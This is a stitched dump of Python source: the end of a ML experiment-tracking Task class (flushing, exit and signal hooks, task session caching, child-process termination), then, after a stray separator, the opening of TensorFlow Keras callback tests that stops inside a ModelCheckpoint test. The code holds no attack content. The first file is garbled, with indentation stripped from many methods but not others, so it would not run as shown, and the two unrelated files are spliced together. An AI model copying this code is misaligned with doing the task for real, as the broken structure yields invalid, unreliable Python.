# mark task as stopped
self.stopped()
    def flush(self, wait_for_uploads=False):
        """
        flush any outstanding reports or console logs
        :param wait_for_uploads: if True the flush will exit only after all outstanding uploads are completed
        :return: True
        """
        # wait for detection repo sync
        if self._detect_repo_async_thread:
            with self._lock:
                # double-checked under the lock: another caller may have already
                # joined and cleared the thread while we waited
                if self._detect_repo_async_thread:
                    try:
                        self._detect_repo_async_thread.join()
                        self._detect_repo_async_thread = None
                    except Exception:
                        pass
        # make sure model upload is done
        if BackendModel.get_num_results() > 0 and wait_for_uploads:
            BackendModel.wait_for_results()
        # flush any outstanding logs
        if self._logger:
            # noinspection PyProtectedMember
            self._logger._flush_stdout_handler()
        self.reporter.flush()
        LoggerRoot.flush()
        return True
def reset(self, set_started_on_success=False, force=False):
"""
Reset the task. Task will be reloaded following a successful reset.
Notice: when running remotely the task will not be reset (as it will clear all logs and metrics)
:param set_started_on_success: automatically set started if reset was successful
:param force: force task reset even if running remotely
"""
if not running_remotely() or not self.is_main_task() or force:
super(Task, self).reset(set_started_on_success=set_started_on_success)
    def close(self):
        """
        Close the current Task. Enables to manually shutdown the task.
        Should only be called if you are absolutely sure there is no need for the Task.
        """
        self._at_exit()
        # NOTE(review): the flag is reset *after* running the exit handler,
        # apparently so the registered atexit hook can run _at_exit again at
        # interpreter shutdown -- confirm intent.
        self._at_exit_called = False
def is_current_task(self):
"""
Check if this task is the main task (returned by Task.init())
NOTE: This call is deprecated. Please use Task.is_main_task()
If Task.init() was never called, this method will *not* create
it, making this test cheaper than Task.init() == task
:return: True if this task is the current task
"""
return self.is_main_task()
def is_main_task(self):
"""
Check if this task is the main task (returned by Task.init())
If Task.init() was never called, this method will *not* create
it, making this test cheaper than Task.init() == task
:return: True if this task is the current task
"""
return self is self.__main_task
def set_model_config(self, config_text=None, config_dict=None):
"""
Set Task model configuration text/dict (before creating an output model)
When an output model is created it will inherit these properties
:param config_text: model configuration (unconstrained text string). usually the content of a configuration file.
If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
design = OutputModel._resolve_config(config_text=config_text, config_dict=config_dict)
super(Task, self)._set_model_design(design=design)
def get_model_config_text(self):
"""
Get Task model configuration text (before creating an output model)
When an output model is created it will inherit these properties
:return model config_text (unconstrained text string). usually the content of a configuration file.
If `config_text` is not None, `config_dict` must not be provided.
"""
return super(Task, self).get_model_design()
def get_model_config_dict(self):
"""
Get Task model configuration dictionary (before creating an output model)
When an output model is created it will inherit these properties
:return model config_text (unconstrained text string). usually the content of a configuration file.
If `config_text` is not None, `config_dict` must not be provided.
"""
config_text = self.get_model_config_text()
return OutputModel._text_to_config_dict(config_text)
def set_model_label_enumeration(self, enumeration=None):
"""
Set Task output label enumeration (before creating an output model)
When an output model is created it will inherit these properties
:param enumeration: dictionary of string to integer, enumerating the model output to labels
example: {'background': 0 , 'person': 1}
"""
super(Task, self).set_model_label_enumeration(enumeration=enumeration)
def get_last_iteration(self):
"""
Return the last reported iteration (i.e. the maximum iteration the task reported a metric for)
Notice, this is not a cached call, it will ask the backend for the answer (no local caching)
:return integer, last reported iteration number
"""
self.reload()
return self.data.last_iteration
def set_last_iteration(self, last_iteration):
"""
Forcefully set the last reported iteration
(i.e. the maximum iteration the task reported a metric for)
:param last_iteration: last reported iteration number
:type last_iteration: integer
"""
self.data.last_iteration = int(last_iteration)
self._edit(last_iteration=self.data.last_iteration)
@classmethod
def set_credentials(cls, host=None, key=None, secret=None):
"""
Set new default TRAINS-server host and credentials
These configurations will be overridden by wither OS environment variables or trains.conf configuration file
Notice: credentials needs to be set prior to Task initialization
:param host: host url, example: host='http://localhost:8008'
:type host: str
:param key: user key/secret pair, example: key='thisisakey123'
:type key: str
:param secret: user key/secret pair, example: secret='thisisseceret123'
:type secret: str
"""
if host:
Session.default_host = host
if key:
Session.default_key = key
if secret:
Session.default_secret = secret
    def _connect_output_model(self, model):
        # Attach an OutputModel to this task; model.connect() registers the task
        # on the model side so design/labels flow between the two.
        assert isinstance(model, OutputModel)
        model.connect(self)
    def _save_output_model(self, model):
        """
        Save a reference to the connected output model, so it can be
        re-connected later (see _reconnect_output_model).

        :param model: The connected output model
        """
        self._connected_output_model = model
    def _reconnect_output_model(self):
        """
        If there is a saved connected output model, connect it again.

        This is needed if the input model is connected after the output model
        is connected, and then we will have to get the model design from the
        input model by reconnecting.
        """
        if self._connected_output_model:
            self.connect(self._connected_output_model)
def _connect_input_model(self, model):
assert isinstance(model, InputModel)
# we only allow for an input model to be connected once
# at least until we support multiple input models
# notice that we do not check the task's input model because we allow task reuse and overwrite
# add into comment that we are using this model
comment = self.comment or ''
if not comment.endswith('\n'):
comment += '\n'
comment += 'Using model id: {}'.format(model.id)
self.set_comment(comment)
if self._last_input_model_id and self._last_input_model_id != model.id:
self.log.warning('Task connect, second input model is not supported, adding into comment section')
return
self._last_input_model_id = model.id
model.connect(self)
def _try_set_connected_parameter_type(self, option):
# """ Raise an error if current value is not None and not equal to the provided option value """
# value = self._connected_parameter_type
# if not value or value == option:
# self._connected_parameter_type = option
# return option
#
# def title(option):
# return " ".join(map(str.capitalize, option.split("_")))
#
# raise ValueError(
# "Task already connected to {}. "
# "Task can be connected to only one the following argument options: {}".format(
# title(value),
# ' / '.join(map(title, self._ConnectedParametersType._options())))
# )
# added support for multiple type connections through _Arguments
return option
    def _connect_argparse(self, parser, args=None, namespace=None, parsed_args=None):
        """
        Connect an argparse.ArgumentParser to the task.

        Locally the parser's values are reported to the backend; when running
        remotely the backend parameters are copied back into the parser.
        """
        # do not allow argparser to connect to jupyter notebook
        # noinspection PyBroadException
        try:
            if 'IPython' in sys.modules:
                from IPython import get_ipython
                ip = get_ipython()
                if ip is not None and 'IPKernelApp' in ip.config:
                    return
        except Exception:
            pass
        self._try_set_connected_parameter_type(self._ConnectedParametersType.argparse)
        if self.is_main_task():
            argparser_update_currenttask(self)
        # if parser/parsed_args were not supplied, fall back to the last parser
        # that called parse_args (recorded by the argparse bindings)
        if (parser is None or parsed_args is None) and argparser_parseargs_called():
            _parser, _parsed_args = get_argparser_last_args()
            if parser is None:
                parser = _parser
            if parsed_args is None and parser == _parser:
                parsed_args = _parsed_args
        if running_remotely() and self.is_main_task():
            # This hack prevents Argparse from crashing when running remotely with different set of parameters
            sys.argv = sys.argv[:1]
            self._arguments.copy_to_parser(parser, parsed_args)
        else:
            self._arguments.copy_defaults_from_argparse(parser, args=args, namespace=namespace, parsed_args=parsed_args)
def _connect_dictionary(self, dictionary):
self._try_set_connected_parameter_type(self._ConnectedParametersType.dictionary)
if running_remotely() and self.is_main_task():
dictionary = self._arguments.copy_to_dict(dictionary)
else:
dictionary = self._arguments.copy_from_dict(dictionary)
return dictionary
def _connect_task_parameters(self, attr_class):
self._try_set_connected_parameter_type(self._ConnectedParametersType.task_parameters)
if running_remotely() and self.is_main_task():
attr_class.update_from_dict(self.get_parameters())
else:
self.set_parameters(attr_class.to_dict())
    def _validate(self, check_output_dest_credentials=False):
        # Validation only runs during remote execution; local runs skip it.
        # Output-destination credential checks are always disabled here,
        # regardless of the argument value.
        if running_remotely():
            super(Task, self)._validate(check_output_dest_credentials=False)
    def _output_model_updated(self):
        """ Called when a connected output model is updated """
        # dev-mode bookkeeping only applies to the local main task
        if running_remotely() or not self.is_main_task():
            return
        # Make sure we know we've started, just in case we didn't so far
        self._dev_mode_task_start(model_updated=True)
        # Store uncommitted code changes
        self._store_uncommitted_code_changes()
    def _store_uncommitted_code_changes(self):
        # NOTE(review): currently a no-op stub - it only evaluates its guards
        # and returns; the actual diff-storing implementation is absent here.
        if running_remotely() or not self.is_main_task():
            return
        if not self.__store_diff_on_train:
            # Feature turned off
            return
        return
    def _dev_mode_task_start(self, model_updated=False):
        """ Called when we suspect the task has started running """
        # safe to call repeatedly - _dev_mode_setup_worker returns early once
        # the dev worker exists
        self._dev_mode_setup_worker(model_updated=model_updated)
    def _dev_mode_stop_task(self, stop_reason):
        """Stop a dev-mode task after a user abort: flush, mark stopped, then hard-exit."""
        # make sure we do not get called (by a daemon thread) after at_exit
        if self._at_exit_called:
            return
        self.get_logger().warn(
            "### TASK STOPPED - USER ABORTED - {} ###".format(
                stop_reason.upper().replace('_', ' ')
            )
        )
        self.flush(wait_for_uploads=True)
        self.stopped()
        if self._dev_worker:
            self._dev_worker.unregister()
        # NOTICE! This will end the entire execution tree!
        if self.__exit_hook:
            self.__exit_hook.remote_user_aborted = True
        # graceful terminate first, then force-kill whatever survived
        self._kill_all_child_processes(send_kill=False)
        time.sleep(2.0)
        self._kill_all_child_processes(send_kill=True)
        # noinspection PyProtectedMember
        os._exit(1)
@staticmethod
def _kill_all_child_processes(send_kill=False):
# get current process if pid not provided
include_parent = True
pid = os.getpid()
try:
parent = psutil.Process(pid)
except psutil.Error:
# could not find parent process id
return
for child in parent.children(recursive=True):
if send_kill:
child.kill()
else:
child.terminate()
# kill ourselves
if send_kill:
parent.kill()
else:
parent.terminate()
def _dev_mode_setup_worker(self, model_updated=False):
if running_remotely() or not self.is_main_task():
return
if self._dev_worker:
return self._dev_worker
self._dev_worker = DevWorker()
self._dev_worker.register(self)
logger = self.get_logger()
flush_period = logger.get_flush_period()
if not flush_period or flush_period > self._dev_worker.report_period:
logger.set_flush_period(self._dev_worker.report_period)
    def _at_exit(self):
        """
        Will happen automatically once we exit code, i.e. atexit

        Flushes pending uploads, finalizes the task status on the backend
        (completed/stopped/failed) and releases dev-mode resources.
        :return:
        """
        if self._at_exit_called:
            return
        # noinspection PyBroadException
        try:
            # from here do not get into watch dog
            self._at_exit_called = True
            wait_for_uploads = True
            # first thing mark task as stopped, so we will not end up with "running" on lost tasks
            # if we are running remotely, the daemon will take care of it
            task_status = None
            if not running_remotely() and self.is_main_task():
                # check if we crashed, or the signal is not interrupt (manual break)
                task_status = ('stopped', )
                if self.__exit_hook:
                    # signal 2 is SIGINT (manual break) and counts as a clean stop
                    if self.__exit_hook.exception is not None or \
                            (not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal not in (None, 2)):
                        task_status = ('failed', 'Exception')
                        wait_for_uploads = False
                    else:
                        wait_for_uploads = (self.__exit_hook.remote_user_aborted or self.__exit_hook.signal is None)
                        if not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal is None:
                            task_status = ('completed', )
                        else:
                            task_status = ('stopped', )
            # wait for uploads
            print_done_waiting = False
            if wait_for_uploads and (BackendModel.get_num_results() > 0 or self.reporter.get_num_results() > 0):
                self.log.info('Waiting to finish uploads')
                print_done_waiting = True
            # from here, do not send log in background thread
            if wait_for_uploads:
                self.flush(wait_for_uploads=True)
                if print_done_waiting:
                    self.log.info('Finished uploading')
            else:
                self._logger._flush_stdout_handler()
            # from here, do not check worker status
            if self._dev_worker:
                self._dev_worker.unregister()
            # change task status
            if not task_status:
                pass
            elif task_status[0] == 'failed':
                self.mark_failed(status_reason=task_status[1])
            elif task_status[0] == 'completed':
                self.completed()
            elif task_status[0] == 'stopped':
                self.stopped()
            # stop resource monitoring
            if self._resource_monitor:
                self._resource_monitor.stop()
            self._logger.set_flush_period(None)
            # this is so in theory we can close a main task and start a new one
            Task.__main_task = None
        except Exception:
            # make sure we do not interrupt the exit process
            pass
    @classmethod
    def __register_at_exit(cls, exit_callback):
        """
        Install process-exit hooks (sys.exit, sys.excepthook, atexit and
        signal handlers) that invoke exit_callback exactly once on shutdown.
        """
        class ExitHooks(object):
            _orig_exit = None
            _orig_exc_handler = None
            remote_user_aborted = False
            def __init__(self, callback):
                self.exit_code = None
                self.exception = None
                self.signal = None
                self._exit_callback = callback
                self._org_handlers = {}
                self._signal_recursion_protection_flag = False
                self._except_recursion_protection_flag = False
            def update_callback(self, callback):
                # swap the registered atexit callback (unregister needs py3)
                if self._exit_callback and not six.PY2:
                    try:
                        atexit.unregister(self._exit_callback)
                    except Exception:
                        pass
                self._exit_callback = callback
                atexit.register(self._exit_callback)
            def hook(self):
                # wrap sys.exit / sys.excepthook once, keeping the originals
                if self._orig_exit is None:
                    self._orig_exit = sys.exit
                sys.exit = self.exit
                if self._orig_exc_handler is None:
                    self._orig_exc_handler = sys.excepthook
                sys.excepthook = self.exc_handler
                atexit.register(self._exit_callback)
                # SIGQUIT is not available on Windows
                if sys.platform == 'win32':
                    catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
                                     signal.SIGILL, signal.SIGFPE]
                else:
                    catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
                                     signal.SIGILL, signal.SIGFPE, signal.SIGQUIT]
                for s in catch_signals:
                    # noinspection PyBroadException
                    try:
                        self._org_handlers[s] = signal.getsignal(s)
                        signal.signal(s, self.signal_handler)
                    except Exception:
                        pass
            def exit(self, code=0):
                self.exit_code = code
                self._orig_exit(code)
            def exc_handler(self, exctype, value, traceback, *args, **kwargs):
                # record the exception, then delegate to the original handler
                if self._except_recursion_protection_flag:
                    return sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
                self._except_recursion_protection_flag = True
                self.exception = value
                if self._orig_exc_handler:
                    ret = self._orig_exc_handler(exctype, value, traceback, *args, **kwargs)
                else:
                    ret = sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
                self._except_recursion_protection_flag = False
                return ret
            def signal_handler(self, sig, frame):
                if self._signal_recursion_protection_flag:
                    # call original
                    org_handler = self._org_handlers.get(sig)
                    if isinstance(org_handler, Callable):
                        org_handler = org_handler(sig, frame)
                    return org_handler
                self._signal_recursion_protection_flag = True
                # call exit callback
                self.signal = sig
                if self._exit_callback:
                    # noinspection PyBroadException
                    try:
                        self._exit_callback()
                    except Exception:
                        pass
                # call original signal handler
                org_handler = self._org_handlers.get(sig)
                if isinstance(org_handler, Callable):
                    # noinspection PyBroadException
                    try:
                        org_handler = org_handler(sig, frame)
                    except Exception:
                        org_handler = signal.SIG_DFL
                # remove stdout logger, just in case
                # noinspection PyBroadException
                try:
                    Logger._remove_std_logger()
                except Exception:
                    pass
                self._signal_recursion_protection_flag = False
                # return handler result
                return org_handler
        # install the hooks once per process; later calls only swap the callback
        if cls.__exit_hook is None:
            # noinspection PyBroadException
            try:
                cls.__exit_hook = ExitHooks(exit_callback)
                cls.__exit_hook.hook()
            except Exception:
                cls.__exit_hook = None
        elif cls.__main_task is None:
            cls.__exit_hook.update_callback(exit_callback)
@classmethod
def __get_task(cls, task_id=None, project_name=None, task_name=None):
if task_id:
return cls(private=cls.__create_protection, task_id=task_id)
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
project=[project.id],
name=exact_match_regex(task_name),
only_fields=['id', 'name']
)
)
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(
private=cls.__create_protection,
task_id=task.id,
log_to_backend=False,
)
@classmethod
def __get_hash_key(cls, *args):
def normalize(x):
return "<{}>".format(x) if x is not None else ""
return ":".join(map(normalize, args))
@classmethod
def __get_last_used_task_id(cls, default_project_name, default_task_name, default_task_type):
hash_key = cls.__get_hash_key(cls._get_api_server(), default_project_name, default_task_name, default_task_type)
# check if we have a cached task_id we can reuse
# it must be from within the last 24h and with the same project/name/type
task_sessions = SessionCache.load_dict(str(cls))
task_data = task_sessions.get(hash_key)
if task_data is None:
return None
try:
task_data['type'] = cls.TaskTypes(task_data['type'])
except (ValueError, KeyError):
LoggerRoot.get_base_logger().warning(
"Corrupted session cache entry: {}. "
"Unsupported task type: {}"
"Creating a new task.".format(hash_key, task_data['type']),
)
return None
return task_data
@classmethod
def __update_last_used_task_id(cls, default_project_name, default_task_name, default_task_type, task_id):
hash_key = cls.__get_hash_key(cls._get_api_server(), default_project_name, default_task_name, default_task_type)
task_id = str(task_id)
# update task session cache
task_sessions = SessionCache.load_dict(str(cls))
last_task_session = {'time': time.time(), 'project': default_project_name, 'name': default_task_name,
'type': default_task_type, 'id': task_id}
# remove stale sessions
for k in list(task_sessions.keys()):
if ((time.time() - task_sessions[k].get('time', 0)) >
60 * 60 * cls.__task_id_reuse_time_window_in_hours):
task_sessions.pop(k)
# update current session
task_sessions[hash_key] = last_task_session
# store
SessionCache.store_dict(str(cls), task_sessions)
@classmethod
def __task_timed_out(cls, task_data):
return \
task_data and \
task_data.get('id') and \
task_data.get('time') and \
(time.time() - task_data.get('time')) > (60 * 60 * cls.__task_id_reuse_time_window_in_hours)
@classmethod
def __get_task_api_obj(cls, task_id, only_fields=None):
if not task_id:
return None
all_tasks = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(id=[task_id], only_fields=only_fields),
).response.tasks
# The task may not exist in environment changes
if not all_tasks:
return None
return all_tasks[0]
    @classmethod
    def __task_is_relevant(cls, task_data):
        """
        Check that a cached task is relevant for reuse.

        A task is relevant for reuse if:
        1. It is not timed out, i.e. it was last used in the previous 24 hours.
        2. Its name, project and type match the data in the server, so as not
           to override user changes made by using the UI.

        :param task_data: A mapping from 'id', 'name', 'project', 'type' keys
            to the task's values, as saved in the cache.
        :return: True if the task is relevant for reuse, False if not.
        """
        if not task_data:
            return False
        if cls.__task_timed_out(task_data):
            return False
        task_id = task_data.get('id')
        if not task_id:
            return False
        task = cls.__get_task_api_obj(task_id, ('id', 'name', 'project', 'type'))
        if task is None:
            return False
        # resolve the project name (the server stores only the project id)
        project_name = None
        if task.project:
            project = cls._send(
                cls._get_default_session(),
                projects.GetByIdRequest(project=task.project)
            ).response.project
            if project:
                project_name = project.name
        compares = (
            (task.name, 'name'),
            (project_name, 'project'),
            (task.type, 'type'),
        )
        # compare after casting to string to avoid enum instance issues
        # remember we might have replaced the api version by now, so enums are different
        return all(str(server_data) == str(task_data.get(task_data_key)) for server_data, task_data_key in compares)
@classmethod
def __close_timed_out_task(cls, task_data):
if not task_data:
return False
task = cls.__get_task_api_obj(task_data.get('id'), ('id', 'status'))
if task is None:
return False
stopped_statuses = (
tasks.TaskStatusEnum.stopped,
tasks.TaskStatusEnum.published,
tasks.TaskStatusEnum.publishing,
tasks.TaskStatusEnum.closed,
tasks.TaskStatusEnum.failed,
tasks.TaskStatusEnum.completed,
)
if task.status not in stopped_statuses:
cls._send(
cls._get_default_session(),
tasks.StoppedRequest(
task=task.id,
force=True,
status_message="Stopped timed out development task"
),
)
return True
return False
|
callbacks_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import json
import os
import re
import shutil
import sys
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import summary_pb2
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.python.keras.optimizer_v2 import learning_rate_schedule
from tensorflow.python.keras.utils import np_utils
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
from tensorflow.python.training import checkpoint_management
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
# Dataset/model sizes shared by the tests below.
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
  """Counts the number of times each callback method was run.

  Attributes:
    method_counts: dict. Contains the counts of time each callback method was
      run.
  """

  def __init__(self):
    self.method_counts = collections.defaultdict(int)
    hooks = (
        'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
        'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
        'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
        'on_test_begin', 'on_test_end', 'on_train_batch_begin',
        'on_train_batch_end', 'on_train_begin', 'on_train_end')
    for hook_name in hooks:
      original = getattr(self, hook_name)
      setattr(self, hook_name, self.wrap_with_counts(hook_name, original))

  def wrap_with_counts(self, method_name, method):
    """Returns `method` wrapped so that each invocation bumps its count."""

    def _counted(*args, **kwargs):
      self.method_counts[method_name] += 1
      return method(*args, **kwargs)

    return _counted
def _get_numpy():
  """Returns a small constant (features, labels) numpy training pair."""
  features = np.ones((10, 10))
  labels = np.ones((10, 1))
  return features, labels
def _get_sequence():
  """Returns a 5-batch constant keras Sequence (and None as the labels arg)."""

  class _ConstSequence(keras.utils.data_utils.Sequence):

    def __getitem__(self, _):
      return np.ones((2, 10)), np.ones((2, 1))

    def __len__(self):
      return 5

  return _ConstSequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
  # Verifies that each callback hook fires the expected number of times
  # during fit/evaluate/predict, for numpy-array and Sequence inputs alike.
  def _check_counts(self, counter, expected_counts):
    """Checks that the counts registered by `counter` are those expected."""
    for method_name, expected_count in expected_counts.items():
      self.assertEqual(
          counter.method_counts[method_name],
          expected_count,
          msg='For method {}: expected {}, got: {}'.format(
              method_name, expected_count, counter.method_counts[method_name]))
  def _get_model(self):
    # Minimal two-layer binary classifier; eager/graph mode follows the
    # keras_parameterized run mode.
    layers = [
        keras.layers.Dense(10, activation='relu'),
        keras.layers.Dense(1, activation='sigmoid')
    ]
    model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
    model.compile(
        adam.AdamOptimizer(0.001),
        'binary_crossentropy',
        run_eagerly=testing_utils.should_run_eagerly())
    return model
  @parameterized.named_parameters(('with_numpy', _get_numpy()),
                                  ('with_sequence', _get_sequence()))
  def test_callback_hooks_are_called_in_fit(self, data):
    if not context.executing_eagerly():
      self.skipTest('Behavior changed in v2.')
    x, y = data
    val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
    model = self._get_model()
    counter = Counter()
    model.fit(
        x,
        y,
        validation_data=(val_x, val_y),
        batch_size=2,
        steps_per_epoch=5,
        epochs=5,
        callbacks=[counter])
    # 5 epochs x 5 train steps, plus 2 validation batches per epoch.
    self._check_counts(
        counter, {
            'on_batch_begin': 25,
            'on_batch_end': 25,
            'on_epoch_begin': 5,
            'on_epoch_end': 5,
            'on_predict_batch_begin': 0,
            'on_predict_batch_end': 0,
            'on_predict_begin': 0,
            'on_predict_end': 0,
            'on_test_batch_begin': 10,
            'on_test_batch_end': 10,
            'on_test_begin': 5,
            'on_test_end': 5,
            'on_train_batch_begin': 25,
            'on_train_batch_end': 25,
            'on_train_begin': 1,
            'on_train_end': 1
        })
  @parameterized.named_parameters(('with_numpy', _get_numpy()),
                                  ('with_sequence', _get_sequence()))
  def test_callback_hooks_are_called_in_evaluate(self, data):
    x, y = data
    # Sequence inputs define their own batching, so batch_size/steps swap roles.
    is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
    model = self._get_model()
    counter = Counter()
    model.evaluate(
        x,
        y,
        batch_size=2 if not is_sequence else None,
        steps=5 if is_sequence else None,
        callbacks=[counter])
    self._check_counts(
        counter, {
            'on_test_batch_begin': 5,
            'on_test_batch_end': 5,
            'on_test_begin': 1,
            'on_test_end': 1
        })
  @parameterized.named_parameters(('with_numpy', _get_numpy()),
                                  ('with_sequence', _get_sequence()))
  def test_callback_hooks_are_called_in_predict(self, data):
    x = data[0]
    is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
    model = self._get_model()
    counter = Counter()
    model.predict(
        x,
        batch_size=2 if not is_sequence else None,
        steps=5 if is_sequence else None,
        callbacks=[counter])
    self._check_counts(
        counter, {
            'on_predict_batch_begin': 5,
            'on_predict_batch_end': 5,
            'on_predict_begin': 1,
            'on_predict_end': 1
        })
  def test_callback_list_methods(self):
    # Exercises CallbackList's batch-level dispatch directly, without a model.
    counter = Counter()
    callback_list = keras.callbacks.CallbackList([counter])
    batch = 0
    callback_list.on_test_batch_begin(batch)
    callback_list.on_test_batch_end(batch)
    callback_list.on_predict_batch_begin(batch)
    callback_list.on_predict_batch_end(batch)
    self._check_counts(
        counter, {
            'on_test_batch_begin': 1,
            'on_test_batch_end': 1,
            'on_predict_batch_begin': 1,
            'on_predict_batch_end': 1
        })
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((200, 3))
y = array_ops.zeros((200, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = array_ops.ones((200, 3))
y = array_ops.zeros((200, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_data(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
training_dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
val_dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(training_dataset, epochs=2, validation_data=val_dataset)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_validation_split(self):
model = self._get_model(input_shape=(3,))
x = np.ones((100, 3))
y = np.zeros((100, 2))
expected_log = (
r'(?s).*1/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_training_validation(self):
model = self._get_model(input_shape=(2,))
def generator():
for _ in range(100):
yield [1, 1], 1
training = dataset_ops.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2) \
.repeat()
validation = dataset_ops.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
expected_log = (
r'(?s).*1/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x=training, validation_data=validation, epochs=2, steps_per_epoch=20)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_with_dataset_and_partial_batch(self):
model = self._get_model(input_shape=(2,))
def generator():
# Have a partial batch at the end.
for _ in range(9):
yield np.random.random(2), 1
training = dataset_ops.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
validation = dataset_ops.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x=training, validation_data=validation)
# Make sure the value of val_ metrics are not zeros.
log_content = printed.contents()
val_loss = re.findall(r'val_loss: (\d\.\d+)', log_content)
self.assertLen(val_loss, 1)
self.assertGreater(float(val_loss[0]), 0.0)
  @keras_parameterized.run_with_all_model_types
  def test_ModelCheckpoint(self):
    # End-to-end coverage of ModelCheckpoint: monitor/mode combinations,
    # save_best_only, the deprecated `period`, `save_freq`, and argument
    # validation. Later cases reuse the model trained in earlier cases.
    if h5py is None:
      return  # Skip test if models cannot be saved.
    layers = [
        keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
        keras.layers.Dense(NUM_CLASSES, activation='softmax')
    ]
